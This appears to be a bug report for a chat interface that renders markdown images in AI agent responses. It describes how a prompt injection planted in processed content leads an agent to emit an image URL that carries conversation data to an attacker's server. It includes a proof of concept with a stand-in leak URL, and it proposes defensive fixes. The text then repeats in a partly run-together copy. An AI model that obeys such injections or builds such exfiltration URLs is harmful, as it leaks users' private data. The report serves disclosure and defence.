Description
Problem
The chat UI renders markdown from AI responses including external image URLs. This creates a data exfiltration vector known as the markdown pixel tracking or image-based prompt injection exfiltration technique.
Attack flow
- An attacker embeds a prompt injection in data the agent processes (e.g., a document, database record, web page, or tool response).
- The injection instructs the AI to render a markdown image whose URL encodes sensitive conversation content:
- The chat UI renders the markdown. The browser automatically issues a GET request to the attacker's server, leaking the data in the query string.
Proof of concept (as demonstrated in the attached screenshot)
- User sends:
echo this string: owrhgoewrghwèrogher
- Agent echoes it.
- A subsequent injected message asks the agent to echo a markdown image URL with the previous message's content substituted as the
leak= parameter.
- The browser DevTools network tab shows a GET request to
https://my-fake-server/p.png?leak=owrhgoewrghwC3A8rogher — the content has been exfiltrated.
Proposed solution
- Strip external images from markdown rendered in the chat UI (allow-list only trusted origins or disable image rendering entirely for agent responses).
- Or proxy all images through a same-origin endpoint that validates and sanitizes URLs/query parameters before fetching.
- Or enforce a strict Content Security Policy (CSP)
img-src directive that blocks requests to untrusted domains.
- Consider treating
![...]() syntax in agent responses as a security-relevant event that requires sanitization before rendering.
References
- OWASP LLM Top 10 – LLM02: Prompt Injection
- Research on indirect prompt injection via markdown image exfiltration (Greshake et al., 2023)
Use case/motivation
In enterprise deployments, DIAL agents are often configured with access to internal data sources (databases, document stores, APIs) AND given access to the internet via toolsets. When an agent processes untrusted external content (a web page, a document written by a third party, a user-supplied file), a malicious prompt injection can silently instruct the agent to encode and leak any data visible in the conversation history via a rendered markdown image URL.
This is a critical concern because:
- The exfiltration happens silently at the browser rendering layer — no tool call is made, no approval is requested.
- Any data the agent has seen (previous turns, tool responses, retrieved documents) can be exfiltrated.
- The attack works even without any network tool — the browser itself becomes the exfiltration channel.
Sanitizing external image URLs in the chat renderer would eliminate this vector entirely.
Confidential information
Description
Problem
The chat UI renders markdown from AI responses including external image URLs. This creates a data exfiltration vector known as the markdown pixel tracking or image-based prompt injection exfiltration technique.
Attack flow
Proof of concept (as demonstrated in the attached screenshot)
echo this string: owrhgoewrghwèrogherleak=parameter.https://my-fake-server/p.png?leak=owrhgoewrghwC3A8rogher— the content has been exfiltrated.Proposed solution
img-srcdirective that blocks requests to untrusted domains.![...]()syntax in agent responses as a security-relevant event that requires sanitization before rendering.References
Use case/motivation
In enterprise deployments, DIAL agents are often configured with access to internal data sources (databases, document stores, APIs) AND given access to the internet via toolsets. When an agent processes untrusted external content (a web page, a document written by a third party, a user-supplied file), a malicious prompt injection can silently instruct the agent to encode and leak any data visible in the conversation history via a rendered markdown image URL.
This is a critical concern because:
Sanitizing external image URLs in the chat renderer would eliminate this vector entirely.
Confidential information